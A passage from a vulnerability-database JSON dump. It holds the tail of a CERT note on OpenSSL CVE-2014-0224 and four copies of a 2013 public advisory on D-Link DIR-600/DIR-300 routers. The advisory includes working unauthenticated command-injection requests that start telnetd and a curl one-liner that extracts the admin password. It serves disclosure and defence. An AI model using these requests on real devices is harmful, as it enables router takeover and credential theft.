References\n\n### Microsoft Corporation Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Novell, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenVPN Technologies Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Opengear Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Palo Alto Networks Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Process Software Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sophos, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Stonesoft Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Systems, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### eSoft, Inc. Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### netfilter Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### pfSENSE Unknown\n\nNotified: June 02, 2014 Updated: June 02, 2014 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 84 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.4 | AV:A/AC:M/Au:N/C:C/I:P/A:N \nTemporal | 5 | E:POC/RL:OF/RC:C \nEnvironmental | 8.1 | CDP:H/TD:H/CR:H/IR:M/AR:L \n \n \n\n\n### References \n\n * <https://www.openssl.org/news/secadv_20140605.txt>\n * <http://ccsinjection.lepidum.co.jp/>\n * <http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html>\n * <https://plus.google.com/app/basic/stream/z12xhp3hbzbhhjgfm22ncvtbeua1dpaa004>\n\n### Acknowledgements\n\nThanks to KIKUCHI Masashi for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0224](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-0224>) \n---|--- \n**Date Public:** | 2014-06-05 \n**Date First Published:** | 2014-06-05 \n**Date Last Updated: ** | 2015-10-27 02:18 UTC \n**Document Revision: ** | 31 \n", "modified": "2015-10-27T02:18:00", "published": "2014-06-05T00:00:00", "id": "VU:978508", "href": "https://www.kb.cert.org/vuls/id/978508", "type": "cert", "title": "OpenSSL is vulnerable to a man-in-the-middle attack", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": [], "description": "\r\n\r\nDevice Name: DIR-600 / DIR 300 - HW rev B1\r\nVendor: D-Link\r\n\r\n============ Vulnerable Firmware Releases - DIR-300: ============\r\n\r\nFirmware Version : 2.12 - 18.01.2012\r\nFirmware Version : 2.13 - 07.11.2012\r\n\r\n============ Vulnerable Firmware Releases - DIR-600: ============\r\n\r\nFirmware-Version : 2.12b02 - 17/01/2012\r\nFirmware-Version : 2.13b01 - 07/11/2012\r\nFirmware-Version : 2.14b01 - 22/01/2013\r\n\r\n============ Device Description: ============\r\n\r\nD-Link\u00ae introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.\r\n\r\nSource (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...\r\nGerman website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan search:\r\nServer: Linux, HTTP/1.1, DIR-300\r\nServer: Linux, HTTP/1.1, DIR-600\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n * OS Command Injection (unauthenticated) \r\n\r\n=> Parameter cmd\r\n\r\nThe vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.\r\nIt is possible to start a telnetd to compromise the device.\r\n\r\nWARNING: You do not need to be authenticated to the device!\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png\r\n\r\nstarting a telnet server:\r\nRequest:\r\nPOST /command.php HTTP/1.1\r\nHost: 192.168.178.222\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://192.168.178.222/\r\nContent-Length: 15\r\nCookie: uid=hfaiGzkB4z\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\ncmd=telnetd;\r\n\r\nYou do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.\r\n\r\nFor example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*\r\n\r\nNmap Scan after starting the telnetd:\r\nNmap scan report for 192.168.178.222\r\nHost is up (0.022s latency).\r\nNot shown: 995 closed ports\r\nPORT STATE SERVICE VERSION\r\n1/tcp filtered tcpmux\r\n23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!!\r\n<snip>\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png\r\n\r\n * Information disclosure: \r\n\r\nNice server banner to detect this type of devices easily:\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.12\r\n\r\n * For changing the current password there is no request to the current password \r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\n * Insecure Cryptographic Storage: \r\n\r\nThere is no password hashing implemented and so it is saved in plain text on the system:\r\n# cat var/passwd\r\n"admin" "test" "0"\r\n\r\nPositive Technologies has released an advisory in 2011 and D-Link has fixed this issue:\r\nhttp://en.securitylab.ru/lab/PT-2011-30\r\nWith the current version of the firmware the passwords are stored again in plaintext.\r\n\r\nIf you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:\r\n\r\nroot@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php\r\n"admin" "THESECRETPASS" "0"\r\nroot@bt:~#\r\n\r\n * Information Disclosure: \r\n\r\nDetailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.\r\n\r\nRequest:\r\nhttp://Target-IP/DevInfo.txt\r\n\r\nor try to access version.txt and have a look at the html source \r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.14\r\nDate: Fri, 31 Dec 1999 18:04:13 GMT\r\nContent-Length: 267\r\n\r\nFirmware External Version: V2.14\r\nFirmware Internal Version: d1mg\r\nModel Name: DIR-600\r\nHardware Version: Bx\r\nWLAN Domain: 826\r\nKernel: 2.6.33.2\r\nLanguage: en\r\nGraphcal Authentication: Disable\r\nLAN MAC: <snip>\r\nWAN MAC: <snip>\r\nWLAN MAC: <snip>\r\n\r\nThese details are available without authentication.\r\n\r\n * Local path disclosure \r\n\r\nEvery piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.\r\n\r\nRequest:\r\nhttp://<IP>/router_info.xml\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nDate: Sat, 01 Jan 2000 21:22:43 GMT\r\nContent-Type: text/xml\r\nContent-Length: 49\r\n\r\nEPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)\r\n\r\n * Stored XSS via WLAN Assistent and Version Details \r\n\r\nInjecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.\r\n\r\n=> Parameter: SSID\r\n\r\nThe injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated \r\nhttp://Target-IP/version.txt\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de/m1adv2013-003\r\nVideo: http://www.s3cur1ty.de/home-network-horror-days\r\n\r\n============ Time Line: ============\r\n\r\n14.12.2012 - discovered vulnerability\r\n14.12.2012 - contacted dlink with the new vulnerability details via webinterface\r\n20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link\r\n21.12.2012 - D'link responded that they will check the findings *h00ray*\r\n11.01.2013 - requested status update\r\n25.01.2013 - requested status update\r\n25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...\r\n25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better\r\n04.02.2013 - no more responses from D'Link, public release\r\n\r\n===================== Advisory end =====================\r\n", "edition": 1, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SECURITYVULNS:DOC:29027", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29027", "title": "Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-14T10:22:13", "edition": 2, "description": "D-Link DIR-600 and DIR-300 suffer insecure cryptographic storage, remote command execution, information disclosure, and insecure password changing vulnerabilities.", "published": "2013-02-05T00:00:00", "type": "zdt", "title": "D-Link DIR-600 / DIR-300 Command Execution / Bypass / Disclosure", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-02-05T00:00:00", "id": "1337DAY-ID-20291", "href": "https://0day.today/exploit/description/20291", "sourceData": "Device Name: DIR-600 / DIR 300 - HW rev B1\r\nVendor: D-Link\r\n\r\n============ Vulnerable Firmware Releases - DIR-300: ============\r\n\r\nFirmware Version : 2.12 - 18.01.2012\r\nFirmware Version : 2.13 - 07.11.2012\r\n\r\n============ Vulnerable Firmware Releases - DIR-600: ============\r\n\r\nFirmware-Version : 2.12b02 - 17/01/2012\r\nFirmware-Version : 2.13b01 - 07/11/2012\r\nFirmware-Version : 2.14b01 - 22/01/2013\r\n\r\n============ Device Description: ============\r\n\r\nD-Link\u00ae introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.\r\n\r\nSource (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...\r\nGerman website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...\r\n\r\n============ Shodan Torks ============\r\n\r\nShodan search:\r\nServer: Linux, HTTP/1.1, DIR-300\r\nServer: Linux, HTTP/1.1, DIR-600\r\n\r\n============ Vulnerability Overview: ============\r\n\r\n * OS Command Injection (unauthenticated) \r\n\r\n=> Parameter cmd\r\n\r\nThe vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.\r\nIt is possible to start a telnetd to compromise the device.\r\n\r\nWARNING: You do not need to be authenticated to the device!\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png\r\n\r\nstarting a telnet server:\r\nRequest:\r\nPOST /command.php HTTP/1.1\r\nHost: 192.168.178.222\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://192.168.178.222/\r\nContent-Length: 15\r\nCookie: uid=hfaiGzkB4z\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\ncmd=telnetd;\r\n\r\nYou do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.\r\n\r\nFor example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*\r\n\r\nNmap Scan after starting the telnetd:\r\nNmap scan report for 192.168.178.222\r\nHost is up (0.022s latency).\r\nNot shown: 995 closed ports\r\nPORT STATE SERVICE VERSION\r\n1/tcp filtered tcpmux\r\n23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!!\r\n<snip>\r\n\r\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png\r\n\r\n * Information disclosure: \r\n\r\nNice server banner to detect this type of devices easily:\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.12\r\n\r\n * For changing the current password there is no request to the current password \r\n\r\nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.\r\n\r\n * Insecure Cryptographic Storage: \r\n\r\nThere is no password hashing implemented and so it is saved in plain text on the system:\r\n# cat var/passwd\r\n\"admin\" \"test\" \"0\"\r\n\r\nPositive Technologies has released an advisory in 2011 and D-Link has fixed this issue:\r\nhttp://en.securitylab.ru/lab/PT-2011-30\r\nWith the current version of the firmware the passwords are stored again in plaintext.\r\n\r\nIf you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:\r\n\r\n[email\u00a0protected]:~# curl --data \"cmd=cat /var/passwd\" http://<Target IP>/command.php\r\n\"admin\" \"THESECRETPASS\" \"0\"\r\n[email\u00a0protected]:~#\r\n\r\n * Information Disclosure: \r\n\r\nDetailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.\r\n\r\nRequest:\r\nhttp://Target-IP/DevInfo.txt\r\n\r\nor try to access version.txt and have a look at the html source ;)\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.14\r\nDate: Fri, 31 Dec 1999 18:04:13 GMT\r\nContent-Length: 267\r\n\r\nFirmware External Version: V2.14\r\nFirmware Internal Version: d1mg\r\nModel Name: DIR-600\r\nHardware Version: Bx\r\nWLAN Domain: 826\r\nKernel: 2.6.33.2\r\nLanguage: en\r\nGraphcal Authentication: Disable\r\nLAN MAC: <snip>\r\nWAN MAC: <snip>\r\nWLAN MAC: <snip>\r\n\r\nThese details are available without authentication.\r\n\r\n * Local path disclosure \r\n\r\nEvery piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.\r\n\r\nRequest:\r\nhttp://<IP>/router_info.xml\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12\r\nDate: Sat, 01 Jan 2000 21:22:43 GMT\r\nContent-Type: text/xml\r\nContent-Length: 49\r\n\r\nEPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)\r\n\r\n * Stored XSS via WLAN Assistent and Version Details \r\n\r\nInjecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.\r\n\r\n=> Parameter: SSID\r\n\r\nThe injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)\r\nhttp://Target-IP/version.txt\r\n\r\n============ Solution ============\r\n\r\nNo known solution available.\r\n\r\n============ Credits ============\r\n\r\nThe vulnerability was discovered by Michael Messner\r\nMail: devnull#at#s3cur1ty#dot#de\r\nWeb: http://www.s3cur1ty.de/m1adv2013-003\r\nVideo: http://www.s3cur1ty.de/home-network-horror-days\r\n\r\n============ Time Line: ============\r\n\r\n14.12.2012 - discovered vulnerability\r\n14.12.2012 - contacted dlink with the new vulnerability details via webinterface\r\n20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link\r\n21.12.2012 - D'link responded that they will check the findings *h00ray*\r\n11.01.2013 - requested status update\r\n25.01.2013 - requested status update\r\n25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...\r\n25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better\r\n04.02.2013 - no more responses from D'Link, public release\r\n\r\n===================== Advisory end =====================\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20291"}], "packetstorm": [{"lastseen": "2016-11-03T10:20:22", "description": "", "published": "2013-02-05T00:00:00", "type": "packetstorm", "title": "D-Link DIR-600 / DIR-300 Command Execution / Bypass / Disclosure", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-02-05T00:00:00", "id": "PACKETSTORM:120052", "href": "https://packetstormsecurity.com/files/120052/D-Link-DIR-600-DIR-300-Command-Execution-Bypass-Disclosure.html", "sourceData": "`Device Name: DIR-600 / DIR 300 - HW rev B1 \nVendor: D-Link \n \n============ Vulnerable Firmware Releases - DIR-300: ============ \n \nFirmware Version : 2.12 - 18.01.2012 \nFirmware Version : 2.13 - 07.11.2012 \n \n============ Vulnerable Firmware Releases - DIR-600: ============ \n \nFirmware-Version : 2.12b02 - 17/01/2012 \nFirmware-Version : 2.13b01 - 07/11/2012 \nFirmware-Version : 2.14b01 - 22/01/2013 \n \n============ Device Description: ============ \n \nD-Link\u00ae introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network. \n \nSource (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r... \nGerman website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro... \n \n============ Shodan Torks ============ \n \nShodan search: \nServer: Linux, HTTP/1.1, DIR-300 \nServer: Linux, HTTP/1.1, DIR-600 \n \n============ Vulnerability Overview: ============ \n \n* OS Command Injection (unauthenticated) \n \n=> Parameter cmd \n \nThe vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands. \nIt is possible to start a telnetd to compromise the device. \n \nWARNING: You do not need to be authenticated to the device! \n \nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png \n \nstarting a telnet server: \nRequest: \nPOST /command.php HTTP/1.1 \nHost: 192.168.178.222 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nProxy-Connection: keep-alive \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nReferer: http://192.168.178.222/ \nContent-Length: 15 \nCookie: uid=hfaiGzkB4z \nPragma: no-cache \nCache-Control: no-cache \n \ncmd=telnetd; \n \nYou do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details. \n \nFor example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray* \n \nNmap Scan after starting the telnetd: \nNmap scan report for 192.168.178.222 \nHost is up (0.022s latency). \nNot shown: 995 closed ports \nPORT STATE SERVICE VERSION \n1/tcp filtered tcpmux \n23/tcp open telnet BusyBox telnetd 1.14.1 <<==!!! \n<snip> \n \nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png \n \n* Information disclosure: \n \nNice server banner to detect this type of devices easily: \nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12 \nServer: Linux, HTTP/1.1, DIR-600 Ver 2.12 \n \n* For changing the current password there is no request to the current password \n \nWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. \n \n* Insecure Cryptographic Storage: \n \nThere is no password hashing implemented and so it is saved in plain text on the system: \n# cat var/passwd \n\"admin\" \"test\" \"0\" \n \nPositive Technologies has released an advisory in 2011 and D-Link has fixed this issue: \nhttp://en.securitylab.ru/lab/PT-2011-30 \nWith the current version of the firmware the passwords are stored again in plaintext. \n \nIf you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device: \n \nroot@bt:~# curl --data \"cmd=cat /var/passwd\" http://<Target IP>/command.php \n\"admin\" \"THESECRETPASS\" \"0\" \nroot@bt:~# \n \n* Information Disclosure: \n \nDetailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network. \n \nRequest: \nhttp://Target-IP/DevInfo.txt \n \nor try to access version.txt and have a look at the html source ;) \n \nResponse: \nHTTP/1.1 200 OK \nServer: Linux, HTTP/1.1, DIR-600 Ver 2.14 \nDate: Fri, 31 Dec 1999 18:04:13 GMT \nContent-Length: 267 \n \nFirmware External Version: V2.14 \nFirmware Internal Version: d1mg \nModel Name: DIR-600 \nHardware Version: Bx \nWLAN Domain: 826 \nKernel: 2.6.33.2 \nLanguage: en \nGraphcal Authentication: Disable \nLAN MAC: <snip> \nWAN MAC: <snip> \nWLAN MAC: <snip> \n \nThese details are available without authentication. \n \n* Local path disclosure \n \nEvery piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths. \n \nRequest: \nhttp://<IP>/router_info.xml \n \nResponse: \nHTTP/1.1 200 OK \nServer: Linux, HTTP/1.1, DIR-300 Ver 2.12 \nDate: Sat, 01 Jan 2000 21:22:43 GMT \nContent-Type: text/xml \nContent-Length: 49 \n \nEPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1) \n \n* Stored XSS via WLAN Assistent and Version Details \n \nInjecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input. \n \n=> Parameter: SSID \n \nThe injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :) \nhttp://Target-IP/version.txt \n \n============ Solution ============ \n \nNo known solution available. \n \n============ Credits ============ \n \nThe vulnerability was discovered by Michael Messner \nMail: devnull#at#s3cur1ty#dot#de \nWeb: http://www.s3cur1ty.de/m1adv2013-003 \nVideo: http://www.s3cur1ty.de/home-network-horror-days \n \n============ Time Line: ============ \n \n14.12.2012 - discovered vulnerability \n14.12.2012 - contacted dlink with the new vulnerability details via webinterface \n20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link \n21.12.2012 - D'link responded that they will check the findings *h00ray* \n11.01.2013 - requested status update \n25.01.2013 - requested status update \n25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ... \n25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better \n04.02.2013 - no more responses from D'Link, public release \n \n===================== Advisory end ===================== \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/120052/dlink-completefail.txt"}], "exploitdb": [{"lastseen": "2016-02-02T23:20:22", "description": "D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities. Webapps exploit for hardware platform", "published": "2013-02-05T00:00:00", "type": "exploitdb", "title": "D-Link DIR-600 and DIR-300 rev B Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-02-05T00:00:00", "id": "EDB-ID:24453", "href": "https://www.exploit-db.com/exploits/24453/", "sourceData": "Device Name: DIR-600 / DIR 300 - HW rev B1\r\nVendor: D-Link\r\n\r\n============ Vulnerable Firmware Releases - DIR-300: ============\r\n\r\nFirmware Version : 2.12 - 18.01.2012\r\nFirmware Version : 2.13 - 07.11.2012\r\n\r\n============ Vulnerable Firmware Releases - DIR-600: ============\r\n\r\nFirmware-Version : 2.12b02 - 17/01/2012\r\nFirmware-Version : 2.13b01 - 07/11/2012\r\nFirmware-Version : 2.14b01 - 22/01/2013\r\n\r\n============ Device Description: ============\r\n\r\nD-Link\u00c2\u017d introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.\r\n\r\nSource (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...\r\nGerman website: 